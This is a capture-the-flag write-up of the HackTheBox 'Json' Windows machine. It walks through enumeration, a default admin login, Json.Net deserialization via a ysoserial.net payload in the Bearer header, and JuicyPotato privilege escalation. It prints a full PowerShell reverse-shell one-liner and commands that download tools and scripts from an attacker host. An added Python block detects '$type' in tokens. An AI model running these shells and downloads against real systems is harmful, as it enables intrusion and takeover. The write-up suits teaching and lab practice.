Json

Be prepared to reinvent yourself!

HackTheBox Json Machine Info Card

Json is a medium difficulty machine running Windows. It tests your knowledge in OSINT, JSON Deserialization and basic Privilege Escalation. I didn’t find anything too overly complicated with this machine. It was obvious as to what needed to be done it was just a matter of finding the right payload and the correct injection point.

Be sure to checkout the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan json.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-13 10:05 PST
Nmap scan report for json.htb (10.10.10.158)
Host is up (0.31s latency).

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s
|_nbstat: NetBIOS name: JSON, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:98:ae (VMware)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-13T22:06:22
|_  start_date: 2020-01-13T15:49:51

Ports to take note of here are ftp on port 21, winrm on port 5985, smb on port 445, netbios on port 139 and the various rpc ports.

We see a version number for IIS but we don’t see one for FileZilla.

A quick connection with netcat reveals that information:

nc json.htb 21
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/

Using the searchsploit command we see no immediate results pertaining to the versions found.

Directory Bruteforce

Doing a scan with Gobuster using the dir mode reveals some files and directories:

gobuster dir -u http://json.htb -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html,.asp,.aspx -o gobuster_dir-main.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://json.htb
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Follow Redir:   true
[+] Timeout:        10s
===============================================================
2020/01/13 21:15:32 Starting gobuster
===============================================================
/css (Status: 403)
/files (Status: 403)
/img (Status: 403)
/index.html (Status: 200)
/js (Status: 403)
/login.html (Status: 200)
/views (Status: 403)
===============================================================
2020/01/13 21:18:44 Finished
===============================================================

We see two directories of interest files and views. Let’s dig a bit deeper by looking in to views:

gobuster dir -u http://json.htb/views/ -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html,.asp,.aspx -o gobuster_dir-views.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://json.htb/views/
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Follow Redir:   true
[+] Timeout:        10s
===============================================================
2020/01/13 21:32:59 Starting gobuster
===============================================================
/contacto.html (Status: 200)
/forgot.html (Status: 200)
/login.html (Status: 200)
/principal.html (Status: 200)
/productos.html (Status: 200)
===============================================================
2020/01/13 21:36:09 Finished
===============================================================

We find some interesting files but no more directories. Let’s check the files directory as well:

gobuster dir -u http://json.htb/files/ -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html,.asp,.aspx -o gobuster_dir-files.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://json.htb/files/
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Follow Redir:   true
[+] Timeout:        10s
===============================================================
2020/01/13 22:31:18 Starting gobuster
===============================================================
/password.txt (Status: 200)
===============================================================
2020/01/13 22:42:01 Finished
===============================================================

We have a password.txt file! Taking a look at that file all we see is:

Jajaja

Not Correct

Domains

Let’s checkout the main website at http://json.htb:

Json Main Screenshot

Interesting. The page loads slowly enough to show a dashboard briefly before redirecting to login.html. Although this looks like it may be a web app, the page title is SB Admin 2, which I recognise immediately as a Bootstrap dashboard theme by StartBootstrap. So this site is custom rather than a known web app.

Like every login page we come across we try the credentials admin:admin which logs us in.

We are presented with the dashboard that we got a glimpse of:

Json Dashboard Screenshot

Analyzing the login with Burp Suite we notice the POST call to /api/token/ with Accept: application/json and Content-Type: application/json in the header. There’s our JSON reference.

User

On doing some research online we come across many articles on deserialization and specifically what has been coined Friday the 13th JSON Attacks. In these slides we see a tool that may be of use called ysoserial.net where an example is given to create a payload that pings a machine: ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c "ping 10.0.0.19".

Refining our command to fit our needs we end up with the following:

PS> cat payload.ps1 | .\ysoserial.exe -g WindowsIdentity -f Json.Net -o base64 -s

The payload.ps1 file contains the code for a standard PowerShell reverse shell:

cmd /c powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-ip>',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

The result is a base64 encoded output which we will copy to our clipboard:

Json Payload Screenshot

Now let’s setup our listener:

nc -nlvp 1234

Then using Burp Suite we intercept the login and step forward until we see our GET call to /api/Account. We right click and select Send to Repeater (just in case we lose the connection). In our Repeater tab we replace the value of the Bearer header with our payload and send the request to the server:

Json User Exploit Screenshot
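An added detection check, not part of the original post, for the request shape described above: the API base64-decodes the Bearer header and hands the JSON to Json.Net, so a gadget payload has to carry a "$type" key naming the class it wants instantiated. This Python example decodes a header the same way the app does and flags any "$type" it finds. The field names of the legitimate token and the contents of the hostile sample are constructed assumptions for illustration, not a working payload.

```python
import base64
import json


def encode_token(obj):
    """Build a Bearer value the way the app does: JSON, then base64."""
    return base64.b64encode(json.dumps(obj).encode()).decode()


# Constructed sample of a legitimate token (field names are assumed).
LEGIT_BEARER = encode_token(
    {"Id": 1, "UserName": "admin", "Name": "User Admin", "Rol": "Administrator"}
)

# Constructed sample of the top-level shape of a Json.Net gadget payload:
# an attacker-chosen "$type" the server is asked to instantiate. The
# nested value is a placeholder, not a real serialized object.
HOSTILE_BEARER = encode_token(
    {"$type": "System.Security.Principal.WindowsIdentity, mscorlib",
     "System.Security.ClaimsIdentity.actor": "<placeholder-blob>"}
)

# Types a restrictive SerializationBinder would accept. A plain auth DTO
# never needs a "$type" at all, so the allowlist is empty (assumption).
ALLOWED_TYPES = set()


def find_type_names(node):
    """Walk parsed JSON and collect every "$type" value at any depth."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "$type" and isinstance(value, str):
                found.append(value)
            found.extend(find_type_names(value))
    elif isinstance(node, list):
        for item in node:
            found.extend(find_type_names(item))
    return found


def inspect_bearer(header_value):
    """Return ('ok', None), ('malformed', None) or ('suspicious', [types])."""
    try:
        doc = json.loads(base64.b64decode(header_value, validate=True))
    except ValueError:  # covers binascii.Error, JSONDecodeError, bad UTF-8
        return ("malformed", None)
    types = [t for t in find_type_names(doc) if t not in ALLOWED_TYPES]
    return ("suspicious", types) if types else ("ok", None)
```

Rejecting a token before it reaches the deserializer is a stopgap; the real fix is to deserialize with TypeNameHandling.None or a binder that only admits the expected DTO.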

Back at our listener we should see a connection:

nc -nlvp 1234
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.158.
Ncat: Connection from 10.10.10.158:52007.

PS C:\windows\system32\inetsrv> whoami
json\userpool
PS C:\windows\system32\inetsrv> cat C:\Users\userpool\Desktop\user.txt
34459a01f5....9bfb9f52bb

NOTE: If you don’t see a command prompt, hit ENTER.

Just like that we have the user.txt flag. Now onward to root!

Root

Let’s check out what permissions we have:

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 

We see that SeImpersonatePrivilege is enabled so we should be able to use the JuicyPotato exploit.

To get the file on to the machine we start up our webserver on the attacker machine to serve the file:

python3 -m http.server 80

Then download from the victim machine:

Invoke-WebRequest http://<attacker-ip>/JuicyPotato.exe -OutFile C:\Windows\Temp\jp.exe

We will use a PowerShell reverse shell again so we download that as well:

Invoke-WebRequest http://<attacker-ip>/shell.ps1 -OutFile C:\Windows\Temp\shell.ps1

Once again we setup our listener on the attacker machine:

nc -nlvp 6666

And then launch our exploit:

PS> cmd /c '.\jp.exe -l 9999 -p c:\Windows\System32\cmd.exe -a "/c powershell C:\Windows\Temp\shell.ps1" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}'

Back at our listener on the attacker machine we should receive a connection:

nc -nlvp 6666
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.158.
Ncat: Connection from 10.10.10.158:54779.
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cat C:\Users\superadmin\Desktop\root.txt
3cc85d1bed....01b991d441

Conclusion

Overall this machine was quite fun. It was straightforward and practical, showing what insecure JSON deserialization inside a website’s authentication flow leads to. There have been many examples of this type of exploit being used in the wild against insecure authentication APIs.
